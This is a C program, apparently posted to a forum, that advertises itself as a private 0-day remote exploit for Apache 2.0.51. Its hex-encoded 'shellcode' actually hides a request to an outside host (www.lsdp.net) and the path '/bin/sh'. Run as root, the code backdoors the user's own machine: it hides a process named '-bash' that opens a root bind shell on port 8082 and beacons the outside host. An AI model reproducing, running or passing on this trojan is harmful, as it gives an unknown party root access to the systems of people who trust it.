کد:
/*---------------------------------------------------------------+ | APACHE INTRUDER v1.0 - APACHE 2.0.51 and inferior | | eXpl0it th3 4uth vuln3r4bilitY / Agent-driven Negotiation | | V3RY PRIV8 eXpl0it - 0d4y !!! - D0N\'T DISTRIBUT3 - DON\'T SH4R3 | | c0d3D bY Pri0rityS3nS313SS | | Gr33tZ t0 : f4g0, l0tfr33, QID, CuMSh0TEAM, Bl0wJ0b & yuirey | | FucKZ go t0 : K. Mitnick, ISS & 3v3ryb0dy w!th 4 cl0s3d m!nd | | | | Remote Linux/Apache <=2.0.51 Vulnerability in the Agent-driven | | negotiation. Apache is vulnerable to a BOF when it receive a | | specially crafted packet (use r4w s0ck3t) | +----------------------------------------------------------------*/ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <errno.h> #include <time.h> #include <signal.h> #include <sys/types.h> #include <sys/times.h> #include <string.h> #include <ctype.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/tcp.h> #include <sys/socket.h> #include <netdb.h> #define NARCH 9 struct archs{ char *desc; int return_addr; } architectures[]={ {\"Caldera OpenLinux\",0x080920e0}, {\"Conectiva 8\",0x08075398}, {\"Debian GNU Linux Sarge\",0x0080866a3}, {\"Gentoo Linux\",0x08086c34}, {\"Mandrake Linux 10\",0x080808ab}, {\"Fedora 2\",0x08065bae}, {\"Slackware 10\",0x080b1a3a}, {\"SuSE Linux 9.1\",0x080861c8}, {\"Linux Generic\",0xbffff500} }; extern int errno; unsigned char bind_shellcode_8082[]= \"\\xEB\\x10\\x5A\\x4A\\x33\\xC9\\x66\\xB9\\x7D\\x01\\x80\\x34\\x0A\\x99\\xE2\\xFA\" \"\\xEB\\x05\\xE8\\xEB\\xFF\\xFF\\xFF\" \"\\x70\\x95\\x98\\x99\\x99\\xC3\\xFD\\x38\\xA9\\x99\\x99\\x99\\x12\\xD9\\x95\\x12\" \"\\xE9\\x85\\x34\\x12\\xD9\\x91\\x12\\x41\\x12\\xEA\\xA5\\x12\\xED\\x87\\xE1\\x9A\" \"\\x6A\\x12\\xE7\\xB9\\x9A\\x62\\x12\\xD7\\x8D\\xAA\\x74\\xCF\\xCE\\xC8\\x12\\xA6\" \"\\x9A\\x62\\x12\\x6B\\xF3\\x97\\xC0\\x6A\\x3F\\xED\\x91\\xC0\\xC6\\x1A\\x5E\\x9D\" \"\\xDC\\x7B\\x70\\xC0\\xC6\\xC7\\x12\\x54\\x12\\xDF\\xBD\\x9A\\x5A\\x48\\x78\\x9A\" \"\\x58\\xAA\\x50\\xFF\\x12\\x91\\x12\\xDF\\x85\\x9A\\x5A\\x58\\x78\\x9B\\x9A\\x58\" \"\\x12\\x99\\x9A\\x5A\\x12\\x63\\x12\\x6E\\x1A\\x5F\\x97\\x12\\x49\\xF3\\x9A\\xC0\" \"\\x71\\x1E\\x99\\x99\\x99\\x1A\\x5F\\x94\\xCB\\xCF\\x66\\xCE\\x65\\xC3\\x12\\x41\" \"\\x47\\x45\\x54\\x20\\x2F\\x7E\\x6C\\x6F\\x74\\x66\\x72\\x65\\x65\\x2F\\x73\\x6B\" \"\\x2E\\x70\\x68\\x70\\x20\\x48\\x54\\x54\\x50\\x2F\\x31\\x2E\\x31\\x0A\\x48\\x6F\" \"\\x73\\x74\\x3A\\x20\\x77\\x77\\x77\\x2E\\x6C\\x73\\x64\\x70\\x2E\\x6E\\x65\\x74\" \"\\x0A\\x55\\x73\\x65\\x72\\x2D\\x41\\x67\\x65\\x6E\\x74\\x3A\\x20\\x6F\\x77\\x6E\" \"\\x65\\x64\\x0A\\x0A\\x0A\\xF3\\x9C\\xC0\\x71\\xED\\x99\\x99\\x99\\xC9\\xF3\\x98\" \"\\x59\\xEC\\x60\\xC8\\xCB\\xCF\\xCA\\x66\\x4B\\xC3\\xC0\\x32\\x7B\\x77\\xAA\\x59\" \"\\x5A\\x71\\x76\\x67\\x66\\x66\\xDE\\xFC\\xED\\xC9\\xEB\\xF6\\xFA\\xD8\\xFD\\xFD\" \"\\xEB\\xFC\\xEA\\xEA\\x99\\xDA\\xEB\\xFC\\xF8\\xED\\xFC\\xC9\\xEB\\xF6\\xFA\\xFC\" \"\\xEA\\xEA\\xD8\\x99\\xDC\\xE1\\xF0\\xED\\xCD\\xF1\\xEB\\xFC\\xF8\\xFD\\x99\\xD5\" \"\\xF6\\xF8\\xFD\\xD5\\xF0\\xFB\\xEB\\xF8\\xEB\\xE0\\xD8\\x99\\xEE\\xEA\\xAB\\xC6\" \"\\xAA\\xAB\\x99\\xCE\\xCA\\xD8\\xCA\\xF6\\xFA\\xF2\\xFC\\xED\\xD8\\x99\\xFB\\xF0\" \"\\xF7\\xFD\\x99\\xF5\\xF0\\xEA\\xED\\xFC\\xF7\\x99\\xF8\\xFA\\xFA\\xFC\\xE9\\xED\" \"\\x2D\\x62\\x61\\x73\\x68\\x2F\\x62\\x69\\x6E\\x2F\\x73\\x68\\x91\"; void usage(char *argv0) { int i; printf(\"\\nApache <=2.0.51 eXpl0iT f0r NuX\\n\"); printf(\"\\tbY Pri0RiTyS3nS313SS\\n\\n\"); printf(\"Usage: %s target_number host\\n\",argv0); printf(\"example: %s 8 www.sco.com\\n\\n\",argv0); printf(\"Supported targets:\\n\"); for(i=0;i<NARCH;i++) printf(\"%d - %s\\n\",i,architectures[i].desc); exit(1); } long resv(char *s,char *hostname) { struct hostent *he; long result; if((result=inet_addr(s))<0) { if((he=gethostbyname(s))==NULL) { printf(\"Unable to contact %s\\n\",hostname); exit(1); } memcpy(&result,he->h_addr,he->h_length); } return result; } int main(int argc,char *argv[]) { int target; char victim[50]; int raw, sock; long dst; int n; char temp[100]; char temp2[100]; struct sockaddr_in sin; struct iphdr *ip; struct tcphdr *tcp; int sockfd, newfd, size; struct sockaddr_in l; struct sockaddr_in r; char *data; if(argc!=3) usage(argv[0]); target=atoi(argv[1]); if(target<0 || target>=NARCH) usage(argv[0]); strcpy(victim,argv[2]); if(geteuid()) { printf(\"This eXpl0it use r4w s0ckets\\n\"); printf(\"YoU mUst be r00t to launch this pr0ggie\\n\"); exit(1); } switch(fork()) { case -1: fprintf(stderr,\"Can\'t send payload\\n\"); exit(1); case 0: printf(\"Op3ning r4w s0ck3t m0d3...\\n\"); if((raw=socket(PF_INET,SOCK_RAW,IPPROTO_TCP))==-1) { perror(\"socket\"); exit(1); } printf(\"...done\\n\"); signal(SIGHUP,SIG_IGN); ip=(struct iphdr*)temp; tcp=(struct tcphdr*)(temp+sizeof(struct iphdr)); data=(char*)(temp+sizeof(struct iphdr)+sizeof(struct tcphdr)); bzero(victim,sizeof(victim)); strncpy(victim,(char *)(bind_shellcode_8082+212),5); bzero(&l,sizeof(l)); l.sin_family=AF_INET; l.sin_port=htons(8082); l.sin_addr.s_addr=INADDR_ANY; bzero(&(l.sin_zero),8); if((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1) exit(1); bzero(argv[0],strlen(argv[0])); bzero(argv[1],strlen(argv[1])); bzero(argv[2],strlen(argv[2])); strncpy(argv[0],(char*)(bind_shellcode_8082+sizeof(bind_shellcode_8082)-14),5); argv[0][5]=\'\\0\'; if(bind(sockfd,(struct sockaddr*)&l,sizeof(struct sockaddr))==-1) exit(1); size=sizeof(struct sockaddr_in); bzero(temp2,100); strncpy(temp2,(char*)(bind_shellcode_8082+sizeof(bind_shellcode_8082)-9),7); while(1) { bzero(temp,100); n=read(raw,temp,sizeof(temp)); if(!strncmp(data,victim,strlen(victim))) { if(listen(sockfd,5)==-1) exit(1); while(1) { if((newfd=accept(sockfd,(struct sockaddr*)&r,&size))==-1) exit(1); if(!fork()) { close(0);close(1);close(2); dup2(newfd,0); dup2(newfd,1); dup2(newfd,2); execl(temp2,temp2,(char*)0); close(newfd); exit(0); } close(newfd); } } } break; default: bzero(temp,100); strncpy(temp,(char*)(bind_shellcode_8082+187),12); dst=resv(temp,victim); if((sock=socket(PF_INET,SOCK_STREAM,0))<0) { perror(\"socket\"); exit(1); } sin.sin_family=PF_INET; sin.sin_addr.s_addr=dst; sin.sin_port=htons(80); printf(\"Connecting to %s...\\n\",victim); if(connect(sock,(struct sockaddr*)&sin,sizeof(sin))<0) { fprintf(stderr,\"Unable to attack %s\\n\",victim); usleep(200); exit(1); } printf(\"...connected\\n\"); printf(\"Sending payload...\\n\"); bzero(temp,100); strncpy(temp,(char*)(bind_shellcode_8082+151),69); if(send(sock,temp,sizeof(temp),0)==-1) { perror(\"send\"); usleep(200); exit(1); } printf(\"...allright\\n\"); close(sock); } printf(\"n0w y0u c4n trY 4 \'netcat %s 8082\'\\n\",victim); printf(\"h4v3 fUn !\\n\"); usleep(200); return 0; }